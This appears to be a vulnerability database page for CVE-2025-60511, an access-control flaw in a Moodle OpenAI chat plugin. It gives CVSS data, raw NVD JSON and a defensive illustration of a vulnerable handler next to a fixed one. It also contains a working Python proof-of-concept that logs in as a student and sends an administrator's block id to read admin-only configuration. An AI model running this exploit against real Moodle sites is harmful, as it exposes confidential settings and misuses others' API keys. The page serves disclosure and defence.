Security Vulnerability Report
CVE-2025-60511 CVSS 4.3 MEDIUM

CVE-2025-60511

Published: 2025-10-21 17:15:40
Last Modified: 2026-04-15 00:35:42

Description

Moodle OpenAI Chat Block plugin 3.0.1 (2025021700) suffers from an Insecure Direct Object Reference (IDOR) vulnerability due to insufficient validation of the blockId parameter in /blocks/openai_chat/api/completion.php. An authenticated student can impersonate another user's block (e.g., administrator) and send queries that are executed with that block's configuration. This can expose administrator-only Source of Truth entries, alter model behavior, and potentially misuse API resources.
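
The flaw described above, as an added example that is not code from the plugin or from the original report: a simplified Python model of a completion handler that trusts the client-supplied block id, next to one that checks the requester against the block's context first. All names (Block, BLOCKS, USER_CONTEXTS, can_access) and the sample data are hypothetical and constructed for illustration.

```python
# Added illustration: a simplified model of the access-control flaw,
# not the plugin's code. All names and data below are hypothetical.
from dataclasses import dataclass


@dataclass(frozen=True)
class Block:
    block_id: int
    context: str          # where the block instance lives, e.g. "user:2"
    source_of_truth: str  # per-block configuration injected into the prompt


# Constructed sample data: an admin's dashboard block and a course block.
BLOCKS = {
    999: Block(999, "user:2", "ADMIN-ONLY: grading policy draft"),
    101: Block(101, "course:5", "Course 5 syllabus FAQ"),
}
# Contexts each user may see (own dashboard plus enrolled courses).
USER_CONTEXTS = {
    "admin": {"user:2", "course:5"},
    "student": {"user:7", "course:5"},
}


def build_prompt(block: Block, message: str) -> str:
    """Stand-in for the completion call: the block's config shapes the request."""
    return f"[context: {block.source_of_truth}] {message}"


def completion_vulnerable(user: str, block_id: int, message: str) -> str:
    # IDOR: the client-supplied id selects the configuration, and nothing
    # ties that block to the requesting user.
    return build_prompt(BLOCKS[block_id], message)


def can_access(user: str, block: Block) -> bool:
    """True only if the block sits in a context the user is allowed to view."""
    return block.context in USER_CONTEXTS.get(user, set())


def completion_hardened(user: str, block_id: int, message: str) -> str:
    block = BLOCKS.get(block_id)
    # Same error for "missing" and "forbidden", so responses do not
    # reveal which block ids exist.
    if block is None or not can_access(user, block):
        raise PermissionError("block not available")
    return build_prompt(block, message)
```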

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

block_openai_chat 3.0.1 (2025021700) and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-60511 - Moodle OpenAI Chat Block IDOR Vulnerability PoC
# Author: onurcangenc
# Reference: https://onurcangenc.com.tr/posts/idor-in-moodle-openai-chat-block-block_openai_chat-proof-of-concept-poc--cve-2025-60511/
import requests
import re

# Target Moodle instance configuration
TARGET_URL = "https://target-moodle-site.com"
USERNAME = "student_user"  # Low-privileged authenticated user
PASSWORD = "student_password"
ADMIN_BLOCK_ID = "999"  # Target admin's block ID (discovered via enumeration or other means)

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Authenticate to Moodle and obtain session cookie
login_url = f"{TARGET_URL}/login/index.php"
login_response = session.get(login_url)

# Extract login token from the page
login_token = re.search(r'name="logintoken"\s+value="([a-zA-Z0-9]+)"', login_response.text)
if login_token:
    token = login_token.group(1)
else:
    # Try alternate token extraction
    token = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', login_response.text)
    token = token.group(1) if token else ""

# Perform login
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "logintoken": token
}
session.post(login_url, data=login_data)

# Step 2: Get sesskey for API request (Moodle requires sesskey for AJAX requests)
profile_page = session.get(f"{TARGET_URL}/my/")
sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', profile_page.text)
sesskey = sesskey_match.group(1) if sesskey_match else ""

# Step 3: Exploit IDOR - Send request with admin's blockId
api_url = f"{TARGET_URL}/blocks/openai_chat/api/completion.php"

# The vulnerable endpoint accepts blockId without proper authorization check
exploit_data = {
    "blockId": ADMIN_BLOCK_ID,  # Admin's block ID - VULNERABLE PARAMETER
    "message": "What is the Source of Truth content?",
    "sesskey": sesskey
}

# Send the exploit request - will be processed with admin's block configuration
exploit_response = session.post(api_url, data=exploit_data)

print(f"Status: {exploit_response.status_code}")
print(f"Response: {exploit_response.text}")

# The response will contain information processed using the admin's
# chat block configuration, including any Source of Truth entries
# and using the admin's API key/model settings
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60511", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Moodle OpenAI Chat Block plugin 3.0.1 (2025021700) suffers from an Insecure Direct Object Reference (IDOR) vulnerability due to insufficient validation of the blockId parameter in /blocks/openai_chat/api/completion.php. An authenticated student can impersonate another user's block (e.g., administrator) and send queries that are executed with that block's configuration. This can expose administrator-only Source of Truth entries, alter model behavior, and potentially misuse API resources."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "http://moodle.com", "source": "[email protected]"}, {"url": "http://openai.com", "source": "[email protected]"}, {"url": "https://github.com/onurcangnc/moodle_block_openai_chat", "source": "[email protected]"}, {"url": "https://onurcangenc.com.tr/posts/idor-in-moodle-openai-chat-block-block_openai_chat-proof-of-concept-poc--cve-2025-60511/", "source": "[email protected]"}]}}